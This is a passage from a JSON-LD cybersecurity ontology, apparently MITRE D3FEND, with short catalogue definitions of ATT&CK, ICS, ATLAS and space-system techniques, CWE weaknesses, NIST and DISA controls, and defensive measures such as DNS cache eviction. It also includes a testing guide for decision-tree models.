      "d3f:definition": "Starting in Mac OS X 10.7 (Lion), users can specify certain applications to be re-opened when a user reboots their machine. While this is usually done via a Graphical User Interface (GUI) on an app-by-app basis, there are property list files (plist) that contain this information as well located at <code>~/Library/Preferences/com.apple.loginwindow.plist</code> and <code>~/Library/Preferences/ByHost/com.apple.loginwindow.* .plist</code>.",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1547.007",
      "rdfs:label": "Re-opened Applications",
      "rdfs:seeAlso": {
        "@id": "d3f:T1547.007"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:PersistenceTechnique"
      }
    },
    {
      "@id": "d3f:CCI-002169_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system enforces a role-based access control policy over defined subjects and objects.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-06-24T00:00:00"
      },
      "rdfs:label": "CCI-002169"
    },
    {
      "@id": "d3f:RevokePrivilegesFromGroupEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event where specific privileges or rights are removed from a group, restricting its members from performing actions or accessing resources previously allowed by those privileges.",
      "rdfs:label": "Revoke Privileges from Group Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:GroupManagementEvent"
        },
        {
          "@id": "d3f:PermissionRevokingEvent"
        },
        {
          "@id": "_:Nad7bf289b3dd46dc94419f0c8bf089e1"
        }
      ]
    },
    {
      "@id": "_:Nad7bf289b3dd46dc94419f0c8bf089e1",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:preceded-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:AssignPrivilegesToGroupEvent"
      }
    },
    {
      "@id": "d3f:T1567",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1567",
      "d3f:definition": "Adversaries may use an existing, legitimate external Web service to exfiltrate data rather than their primary command and control channel. Popular Web services acting as an exfiltration mechanism may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to compromise. Firewall rules may also already exist to permit traffic to these services.",
      "d3f:produces": {
        "@id": "d3f:OutboundInternetWebTraffic"
      },
      "rdfs:label": "Exfiltration Over Web Service",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ExfiltrationTechnique"
        },
        {
          "@id": "_:N54ba176b0c2242deacfa12d6fddc47c9"
        }
      ]
    },
    {
      "@id": "_:N54ba176b0c2242deacfa12d6fddc47c9",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:produces"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OutboundInternetWebTraffic"
      }
    },
    {
      "@id": "d3f:Reference-UseDNSPolicyForApplyingFiltersOnDNSQueries",
      "@type": [
        "owl:NamedIndividual",
        "d3f:UserManualReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://docs.microsoft.com/en-us/windows-server/networking/dns/deploy/apply-filters-on-dns-queries"
      },
      "d3f:kb-organization": "Microsoft",
      "d3f:kb-reference-title": "Use DNS Policy for Applying Filters on DNS Queries",
      "rdfs:label": "Reference - Use DNS Policy for Applying Filters on DNS Queries"
    },
    {
      "@id": "d3f:CWE-344",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-344",
      "d3f:definition": "The product uses a constant value, name, or reference, but this value can (or should) vary across different environments.",
      "rdfs:label": "Use of Invariant Value in Dynamically Changing Context",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-330"
      }
    },
    {
      "@id": "d3f:NIST_SP_800-53_R5_AC-7_3",
      "@type": [
        "owl:NamedIndividual",
        "d3f:NISTControl"
      ],
      "d3f:control-name": "Unsuccessful Logon Attempts | Biometric Attempt Limiting",
      "d3f:member-of": {
        "@id": "d3f:NIST_SP_800-53_R5"
      },
      "d3f:narrower": {
        "@id": "d3f:AccountLocking"
      },
      "rdfs:label": "AC-7(3)"
    },
    {
      "@id": "d3f:LinuxRename",
      "@type": "owl:Class",
      "d3f:definition": "Change the name or location of a file.",
      "rdfs:isDefinedBy": {
        "@id": "https://man7.org/linux/man-pages/man2/rename.2.html"
      },
      "rdfs:label": "Linux Rename",
      "rdfs:subClassOf": {
        "@id": "d3f:OSAPIMoveFile"
      }
    },
    {
      "@id": "d3f:GetForegroundWindow",
      "@type": [
        "owl:NamedIndividual",
        "d3f:GetOpenWindows"
      ],
      "rdfs:isDefinedBy": {
        "@id": "https://docs.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-getforegroundwindow"
      },
      "rdfs:label": "Get Foreground Window"
    },
    {
      "@id": "d3f:T1055.013",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1055.013",
      "d3f:definition": "Adversaries may inject malicious code into process via process doppelgänging in order to evade process-based defenses as well as possibly elevate privileges. Process doppelgänging is a method of executing arbitrary code in the address space of a separate live process.",
      "d3f:invokes": {
        "@id": "d3f:CreateProcess"
      },
      "rdfs:label": "Process Doppelgänging",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1055"
        },
        {
          "@id": "_:N1c78908b827b49f3b52aa5b2448cb166"
        }
      ]
    },
    {
      "@id": "_:N1c78908b827b49f3b52aa5b2448cb166",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:invokes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:CreateProcess"
      }
    },
    {
      "@id": "d3f:RD-0002.02",
      "@type": "owl:Class",
      "d3f:attack-id": "RD-0002.02",
      "d3f:definition": "Third-party networks (commercial ground stations, hosted modems, cloud-integrated ground-station services) present attractive stepping-stones: they already have vetted RF chains, globally distributed apertures, and trusted IP space. Adversaries may acquire customer credentials via phishing or purchase, exploit weak vetting to create front-company accounts, or compromise provider portals/APIs to submit schedules, alter front-end settings, or exfiltrate collected data. Because traffic originates from “expected” stations and ASN ranges, misuse blends into normal operations. Multi-tenant risks include configuration bleed-over and shared management planes.",
      "rdfs:label": "3rd Party Ground System - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/RD-0002/02/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:RD-0002"
      },
      "skos:prefLabel": "3rd Party Ground System"
    },
    {
      "@id": "d3f:CWE-457",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-457",
      "d3f:definition": "The code uses a variable that has not been initialized, leading to unpredictable or unintended results.",
      "rdfs:label": "Use of Uninitialized Variable",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-908"
      }
    },
    {
      "@id": "d3f:Reference-TechniquesForImpedingAndDetectingNetworkThreats_VerisignInc",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US10904273B1/"
      },
      "d3f:kb-abstract": "Infinite DNS decoy trap resource to catch threats scanning for network resources to attack.\n\nIn various embodiments, a name server transmits a canonical name as resolution to another canonical name. In operation, when a resource name is requested for resolution, a determination is made that the resource name corresponds to a trap resource name. A first canonical name is transmitted as resolution to the trap resource name. The first canonical name is requested for resolution, and a second canonical name is transmitted as resolution. By providing trap canonical names as resolutions to trap canonical names, unauthorized software making the resolution requests is kept occupied with requesting resolution of canonical name after canonical name, impeding the ability of the unauthorized software from traversing a network.",
      "d3f:kb-author": "Ben McCarty, James Graham",
      "d3f:kb-mitre-analysis": "MITRE Analysis was not found.",
      "d3f:kb-organization": "Verisign Inc",
      "d3f:kb-reference-of": {
        "@id": "d3f:DecoyNetworkResource"
      },
      "d3f:kb-reference-title": "Techniques for impeding and detecting network threats",
      "rdfs:label": "Reference - Techniques for impeding and detecting network threats - Verisign Inc"
    },
    {
      "@id": "d3f:KerberosTicket",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "An access ticket/token issued by a Kerberos system.",
      "rdfs:label": "Kerberos Ticket",
      "rdfs:subClassOf": {
        "@id": "d3f:AccessToken"
      }
    },
    {
      "@id": "d3f:attached-to",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x attached-to y: A subject x is joined in close association to an object y.",
      "rdfs:isDefinedBy": {
        "@id": "http://wordnet-rdf.princeton.edu/id/01980375-s"
      },
      "rdfs:label": "attached-to",
      "rdfs:seeAlso": {
        "@id": "d3f:connects"
      },
      "rdfs:subPropertyOf": {
        "@id": "d3f:associated-with"
      }
    },
    {
      "@id": "d3f:Action",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "An Action is a deliberate operation or activity performed by an entity.",
      "rdfs:label": "Action",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:Event"
        },
        {
          "@id": "_:Nf1cdd86e97314e64894e834288c2cff9"
        }
      ]
    },
    {
      "@id": "_:Nf1cdd86e97314e64894e834288c2cff9",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-agent"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Agent"
      }
    },
    {
      "@id": "d3f:T0804",
      "@type": "owl:Class",
      "d3f:attack-id": "T0804",
      "d3f:definition": "Adversaries may block or prevent a reporting message from reaching its intended target. In control systems, reporting messages contain telemetry data (e.g., I/O values) pertaining to the current state of equipment and the industrial process. By blocking these reporting messages, an adversary can potentially hide their actions from an operator.",
      "rdfs:label": "Block Reporting Message - ATTACK ICS",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKICSInhibitResponseFunctionTechnique"
      },
      "skos:prefLabel": "Block Reporting Message"
    },
    {
      "@id": "d3f:used-by",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x used-by y: The inverse of y uses x.",
      "owl:inverseOf": {
        "@id": "d3f:uses"
      },
      "rdfs:label": "used-by",
      "rdfs:subPropertyOf": {
        "@id": "d3f:associated-with"
      }
    },
    {
      "@id": "d3f:CodecLibrary",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A software component that encodes or decodes a data stream of signal.",
      "rdfs:label": "Codec Library",
      "rdfs:subClassOf": {
        "@id": "d3f:SoftwareLibrary"
      }
    },
    {
      "@id": "d3f:T1027.007",
      "@type": "owl:Class",
      "d3f:attack-id": "T1027.007",
      "d3f:definition": "Adversaries may obfuscate then dynamically resolve API functions called by their malware in order to conceal malicious functionalities and impair defensive analysis. Malware commonly uses various [Native API](https://attack.mitre.org/techniques/T1106) functions provided by the OS to perform various tasks such as those involving processes, files, and other system artifacts.",
      "rdfs:label": "Dynamic API Resolution",
      "rdfs:subClassOf": {
        "@id": "d3f:T1027"
      }
    },
    {
      "@id": "d3f:ContentModification",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:ContentModification"
      ],
      "d3f:d3fend-id": "D3-CM",
      "d3f:definition": "Modify content that does not comply with policy.",
      "d3f:filters": [
        {
          "@id": "d3f:DigitalMedia"
        },
        {
          "@id": "d3f:FileContentBlock"
        },
        {
          "@id": "d3f:FileMetadata"
        }
      ],
      "d3f:kb-article": "## How it works\n\nWhen content is found to not comply with it's content policy, it may be transformed to a safer state by modifying it.",
      "d3f:kb-reference": {
        "@id": "d3f:Reference-MethodForContentDisarmandReconstruction_OPSWATInc"
      },
      "d3f:modifies": {
        "@id": "d3f:File"
      },
      "rdfs:label": "Content Modification",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ContentFiltering"
        },
        {
          "@id": "_:N0ba6229a2f6e425bbb14604183f05a53"
        },
        {
          "@id": "_:N73134d72b04e424c90b7c4b793d43873"
        },
        {
          "@id": "_:N01f275438d6e4444a409e7d8eca4f452"
        },
        {
          "@id": "_:Ne3f347da35034693b86e79727bd368e7"
        }
      ]
    },
    {
      "@id": "_:N0ba6229a2f6e425bbb14604183f05a53",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:filters"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:DigitalMedia"
      }
    },
    {
      "@id": "_:N73134d72b04e424c90b7c4b793d43873",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:filters"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:FileContentBlock"
      }
    },
    {
      "@id": "_:N01f275438d6e4444a409e7d8eca4f452",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:filters"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:FileMetadata"
      }
    },
    {
      "@id": "_:Ne3f347da35034693b86e79727bd368e7",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:File"
      }
    },
    {
      "@id": "d3f:DatabaseService",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A database service interacts with a database, either retrieving data through queries or making modifications to its contents.",
      "d3f:executes": {
        "@id": "d3f:DatabaseQuery"
      },
      "d3f:manages": {
        "@id": "d3f:Database"
      },
      "rdfs:label": "Database Service",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ServiceApplicationProcess"
        },
        {
          "@id": "_:N00289ab89559417e95f277215a5c73c3"
        },
        {
          "@id": "_:N121cfa0dff644d608e139a8002afe0c7"
        }
      ]
    },
    {
      "@id": "_:N00289ab89559417e95f277215a5c73c3",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:executes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:DatabaseQuery"
      }
    },
    {
      "@id": "_:N121cfa0dff644d608e139a8002afe0c7",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:manages"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Database"
      }
    },
    {
      "@id": "d3f:DecisionTree",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-DT",
      "d3f:definition": "Decision tree learning is a supervised learning approach used in statistics, data mining, and machine learning. In this formalism, a classification or regression decision tree is used as a predictive model to draw conclusions about a set of observations.",
      "d3f:kb-article": "## How it works\n\nA decision tree starts with a root node, which does not have any incoming branches. The outgoing branches from the root node then feed into the internal nodes, also known as decision nodes. Based on the available features, both node types conduct evaluations to form homogenous subsets, which are denoted by leaf nodes, or terminal nodes. The leaf nodes represent all the possible outcomes within the dataset.\n\n## Considerations\n\nWhile the basic underlying model is that of a decision tree, the decision tree node criteria, and the method for identifying splits varies significantly depending on the learning algorithm selected (e.g., CART, ID3, C4.5, C5.0, CHAID, MARS.)  Extensions like linear and logistic trees can add additional expressiveness as well.\n\n## Key Test Considerations\n\n- **Machine Learning**:\n\n  - **Verify the dataset quality**: Check the data to make sure it is\n      free of errors.  Quantify the degree of missing values,\n      outliers, and noise in the data collection.  If the data quality\n      is low, it may be difficult or impossible to create models and\n      systems with the desired performance.\n\n  - **Verify development datasets are representative**: of expected\n      operational environment and data collection means.  
Compare\n      distributions of dataset features and labels with exploratory\n      data analysis and assess the difference in tests on training\n      data and tests on evaluation data (where the evaluation data\n      must be drawn from a representative dataset.)\n\n  - **Use a variety of data sets**: where available and applicable, to\n      reflect different operating and environment conditions that are\n      likely to be encountered.\n\n  - **Use software libraries**: and tools built for ML where possible, so\n      that the underlying code is verified by prior use.\n\n  - **Diagnose model errors with domain SMEs**: Have problem domain\n    SMEs investigate model errors for conditions for which the model\n    may underperform and suggest refinements.\n\n- **Classification**:\n\n  - **Use Standard Classification Performance Measures**: Not all of\n      the following may be necessary, but should be considered for\n      both verification (developmental test) and operational test\n      stages use:\n\n    - **Accuracy**: The fraction of predictions that were correct.\n\n    - **Precision**: The proportion of positive identifications that were correct.\n\n    - **Recall**: The proportion of actual positive cases identified correctly.\n\n    - **F-Measure**: Combines the precision and recall into a single\n        score.  It is the harmonic mean of the precision and recall.\n\n    - **Receiver Operating Characteristic (ROC) Curve**: A ROC curve\n        shows the performance of a classification model at all\n        classification thresholds.  It graphs the True Positive Rate\n        over the False Positive Rate.\n\n    - **Area Under the ROC Curve (AUC)**: This measures the\n        two-dimensional area under the ROC Curve.  
AUC is\n        scale-invariant and classification-threshold invariant.\n\n    - **ROC TP vs FP points**: In addition to a specific AUC score,\n        the performance at points\n\n    - **Confusion Matrix**: A confusion matrix is a table layout that\n        allows the visualization of the performance of an\n        algorithm. Each row of the matrix represents the instances in\n        an actual class while each column represents the instances in\n        a predicted class, or vice versa. It is a special kind of\n        contingency table, with two dimensions (\"actual\" and\n        \"predicted\"), and identical sets of \"classes\" in both\n        dimensions (each combination of dimension and class is a\n        variable in the contingency table.)\n\n  - **Prediction Bias**: The difference between the average of the\n      predicted labels and the average of the labels in the data\n      set.  One should check for prediction bias when evaluating the\n      classifier's results. Causes of bias can include:\n\n    - **Noisy data set**: Errors in original data can occur, as the\n      collection method may have an underlying bias.\n\n    - **Processing bug**: Errors in the data pipeline can\n      introduce bias.\n\n    - **Biased training sample (unbalanced samples)**: Model\n      parameters may be skewed towards majority classes.\n\n    - **Overly strong regularization**: Model may be underfitting\n       and too simple.\n\n    - **Proxy variables**: Model features may be highly\n       correlated.\n\n- **Supervised Learning**:\n\n  - **Overfitting and Underfitting**: Overfitting occurs when the\n    model built corresponds too closely or exactly to a particular\n    set of data, and thus may fail to fit or predict additional data\n    reliably. An overfitted model is a mathematical model that\n    contains more parameters than can be justified by the data.\n    Underfitting occurs when the model built does not adequately capture\n    the patterns in the data. 
As an example, a linear model will\n    underfit a non-linear dataset.\n\n  - **Sensitivity**: Perform N-fold Cross validation to indicate how\n    much sensitivity the algorithm has to data variation and to avoid\n    overfitting operational models.\n\n- **Decision Tree Learning**:\n\n  - **Sensitive to unbalanced classes**: Examine and determine target\n      class balance; decision tree learning algorithms are especially\n      sensitive to unbalanced target classes.\n\n  - **Consider decision boundaries**: Perform exploratory data\n      analysis to determine if decision boundaries lie along axes of\n      features. _Decision trees are ideal when decision boundaries can\n      be found that lie along axes of features._\n\n   - **Decision tree overfitting** may require tuning algorithm hyperparameters such as tree depth, max features used, max leaf nodes, etc.\n\n   - **Pruning** may result in a more robust model in real-world applications.\n\n   - **Missing values**: Inspect the data set to determine if there\n     are missing values and select a means to address them, either by\n     choosing an algorithm that works well or a way to impute the\n     value or eliminate the missing values in the data sensors or\n     pipeline.\n\n## Platforms, Tools, or Libraries\n\n- **scikit-learn**: includes tree algorithms for ID3, C4.5, C5.0, and CART.\n\n- **Weka**: includes J48 (C4.5), SimpleCart (CART), Logistic Model Trees, Naive Bayes Trees, and more.\n\n### Validation Approach\n- Use operationally relevant data across the range of the application's operating environment.\n- Incorporate some kind of continuous validation to address concept drift and the need to retrain the model and/or check data quality.\n\n## References\n1. Decision tree learning. (2023, May 30). In _Wikipedia_. [Link](https://en.wikipedia.org/wiki/Decision_tree_learning).\n2. Decision Trees. (n.d.). In _scikit-learn User Guide 1.2.2_. [Link](https://scikit-learn.org/stable/modules/tree.html).\n3. 
Concept drift. (2023, April 17). In _Wikipedia_. [Link](https://en.wikipedia.org/wiki/Concept_drift).\n4. 8 Concept Drift Detection Methods. (n.d.). In _Aporia Learning Center_. [Link](https://www.aporia.com/learn/data-drift/concept-drift-detection-methods/).",
      "rdfs:label": "Decision Tree",
      "rdfs:subClassOf": {
        "@id": "d3f:Classification"
      }
    },
    {
      "@id": "d3f:ApplicationDeletionEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event capturing the removal of an application from a system, ensuring its binaries, configuration files, and registry entries are deleted or deactivated.",
      "rdfs:label": "Application Deletion Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ApplicationEvent"
        },
        {
          "@id": "_:N3d45f72099534750bbf9ae09e058136f"
        }
      ]
    },
    {
      "@id": "_:N3d45f72099534750bbf9ae09e058136f",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:preceded-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ApplicationInstallationEvent"
      }
    },
    {
      "@id": "d3f:T0879",
      "@type": "owl:Class",
      "d3f:attack-id": "T0879",
      "d3f:definition": "Adversaries may cause damage and destruction of property to infrastructure, equipment, and the surrounding environment when attacking control systems. This technique may result in device and operational equipment breakdown, or represent tangential damage from other techniques used in an attack. Depending on the severity of physical damage and disruption caused to control processes and systems, this technique may result in [Loss of Safety](https://attack.mitre.org/techniques/T0880). Operations that result in [Loss of Control](https://attack.mitre.org/techniques/T0827) may also cause damage to property, which may be directly or indirectly motivated by an adversary seeking to cause impact in the form of [Loss of Productivity and Revenue](https://attack.mitre.org/techniques/T0828).",
      "rdfs:label": "Damage to Property - ATTACK ICS",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKICSImpactTechnique"
      },
      "skos:prefLabel": "Damage to Property"
    },
    {
      "@id": "d3f:CWE-212",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-212",
      "d3f:definition": "The product stores, transfers, or shares a resource that contains sensitive information, but it does not properly remove that information before the product makes the resource available to unauthorized actors.",
      "rdfs:label": "Improper Removal of Sensitive Information Before Storage or Transfer",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-669"
      }
    },
    {
      "@id": "d3f:AML.T0089",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0089",
      "d3f:definition": "Adversaries may attempt to get information about processes running on a system. Once obtained, this information could be used to gain an understanding of common AI-related software/applications running on systems within the network. Administrator or otherwise elevated access may provide better process details.\n\nIdentifying the AI software stack can then lead an adversary to new targets and attack pathways. AI-related software may require application tokens to authenticate with backend services. This provides opportunities for [Credential Access](/tactics/AML.TA0013) and [Lateral Movement](/tactics/AML.TA0015).\n\nIn Windows environments, adversaries could obtain details on running processes using the Tasklist utility via cmd or `Get-Process` via PowerShell. Information about processes can also be extracted from the output of Native API calls such as `CreateToolhelp32Snapshot`. In Mac and Linux, this is accomplished with the `ps` command. Adversaries may also opt to enumerate processes via `/proc`.",
      "rdfs:label": "Process Discovery - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0089"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:ATLASDiscoveryTechnique"
      },
      "skos:prefLabel": "Process Discovery"
    },
    {
      "@id": "d3f:DNSCacheEviction",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:DNSCacheEviction"
      ],
      "d3f:d3fend-id": "D3-DNSCE",
      "d3f:definition": "Flushing DNS to clear any IP addresses or other DNS records from the cache.",
      "d3f:deletes": {
        "@id": "d3f:DNSRecord"
      },
      "d3f:kb-article": "# How it works\n\nFlushing the DNS Cache will clear the IP addresses of websites you have visited recently. This can help remediate DNS Cache Poisoning attacks, which is a type of cyber attack where corrupted DNS data is inserted into the cache, causing redirects to malicious websites.\n\nOn windows, the DNS cache can be wiped by issuing the command `ipconfig /flushdns`.",
      "d3f:kb-reference": {
        "@id": "d3f:Reference-EvictionGuidanceforNetworksAffectedbytheSolarWindsandActiveDirectory/M365Compromise-CISA"
      },
      "d3f:synonym": "Flush DNS Cache",
      "rdfs:label": "DNS Cache Eviction",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ObjectEviction"
        },
        {
          "@id": "_:N2b4abec528b04f448e62b67e75041413"
        }
      ]
    },
    {
      "@id": "_:N2b4abec528b04f448e62b67e75041413",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:deletes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:DNSRecord"
      }
    },
    {
      "@id": "d3f:T1503",
      "@type": "owl:Class",
      "d3f:attack-id": "T1503",
      "d3f:definition": "Adversaries may acquire credentials from web browsers by reading files specific to the target browser.  (Citation: Talos Olympic Destroyer 2018)",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1555.003",
      "rdfs:label": "Credentials from Web Browsers",
      "rdfs:seeAlso": {
        "@id": "d3f:T1555.003"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:CredentialAccessTechnique"
      }
    },
    {
      "@id": "d3f:OutboundInternetWebTraffic",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "Outbound internet web traffic is network traffic that is: (a) on an outgoing connection initiated from a host within a network to a host outside the network, and (b) using a standard web protocol.",
      "d3f:may-contain": {
        "@id": "d3f:URL"
      },
      "rdfs:label": "Outbound Internet Web Traffic",
      "rdfs:seeAlso": [
        {
          "@id": "dbr:Internetworking"
        },
        {
          "@id": "https://schema.ocsf.io/objects/http_request"
        }
      ],
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OutboundInternetNetworkTraffic"
        },
        {
          "@id": "d3f:WebNetworkTraffic"
        },
        {
          "@id": "_:N67de5dd76a2746eeb900653bf512c014"
        }
      ]
    },
    {
      "@id": "_:N67de5dd76a2746eeb900653bf512c014",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-contain"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:URL"
      }
    },
    {
      "@id": "d3f:CWE-315",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-315",
      "d3f:definition": "The product stores sensitive information in cleartext in a cookie.",
      "rdfs:label": "Cleartext Storage of Sensitive Information in a Cookie",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-312"
      }
    },
    {
      "@id": "d3f:RegSetValueA",
      "@type": [
        "owl:NamedIndividual",
        "d3f:SetSystemConfigValue"
      ],
      "rdfs:label": "RegSetValueA"
    },
    {
      "@id": "d3f:T1562.013",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1562.013",
      "d3f:definition": "Adversaries may disable network device-based firewall mechanisms entirely or add, delete, or modify particular rules in order to bypass controls limiting network usage.",
      "d3f:disables": {
        "@id": "d3f:Firewall"
      },
      "rdfs:label": "Disable or Modify Network Device Firewall",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1562"
        },
        {
          "@id": "_:N9ad75cd8e1a240a8961d9f364b35b45f"
        }
      ]
    },
    {
      "@id": "_:N9ad75cd8e1a240a8961d9f364b35b45f",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:disables"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Firewall"
      }
    },
    {
      "@id": "d3f:T0809",
      "@type": "owl:Class",
      "d3f:attack-id": "T0809",
      "d3f:definition": "Adversaries may perform data destruction over the course of an operation. The adversary may drop or create malware, tools, or other non-native files on a target system to accomplish this, potentially leaving behind traces of malicious activities. Such non-native files and other data may be removed over the course of an intrusion to maintain a small footprint or as a standard part of the post-intrusion cleanup process. (Citation: Enterprise ATT&CK January 2018)",
      "rdfs:label": "Data Destruction - ATTACK ICS",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKICSInhibitResponseFunctionTechnique"
      },
      "skos:prefLabel": "Data Destruction"
    },
    {
      "@id": "d3f:Agent",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "An entity capable of performing intentional actions.",
      "rdfs:label": "Agent",
      "rdfs:seeAlso": {
        "@id": "https://schema.ocsf.io/objects/actor"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:D3FENDCore"
      }
    },
    {
      "@id": "d3f:CCI-001185_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system invalidates session identifiers upon user logout or other session termination.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:AuthenticationCacheInvalidation"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-09-21T00:00:00"
      },
      "rdfs:label": "CCI-001185"
    },
    {
      "@id": "d3f:Classifying",
      "@type": "owl:Class",
      "rdfs:label": "Classifying",
      "rdfs:subClassOf": {
        "@id": "d3f:AnalyticalPurpose"
      }
    },
    {
      "@id": "d3f:verifies",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x verifies y: The technique x confirms the truth of a digital artifact y.",
      "rdfs:isDefinedBy": {
        "@id": "http://wordnet-rdf.princeton.edu/id/00666401-v"
      },
      "rdfs:label": "verifies",
      "rdfs:seeAlso": [
        {
          "@id": "dbr:Formal_verification"
        },
        {
          "@id": "dbr:Runtime_verification"
        },
        {
          "@id": "http://wordnet-rdf.princeton.edu/id/00665271-v"
        }
      ],
      "rdfs:subPropertyOf": [
        {
          "@id": "d3f:analyzes"
        },
        {
          "@id": "d3f:associated-with"
        }
      ]
    },
    {
      "@id": "d3f:CWE-259",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-259",
      "d3f:definition": "The product contains a hard-coded password, which it uses for its own inbound authentication or for outbound communication to external components.",
      "rdfs:label": "Use of Hard-coded Password",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-798"
      }
    },
    {
      "@id": "d3f:CCI-000192_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system enforces password complexity by the minimum number of upper case characters used.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:StrongPasswordPolicy"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-09-15T00:00:00"
      },
      "rdfs:label": "CCI-000192"
    },
    {
      "@id": "d3f:CWE-1296",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1296",
      "d3f:definition": "The product's debug components contain incorrect chaining or granularity of debug components.",
      "rdfs:label": "Incorrect Chaining or Granularity of Debug Components",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-284"
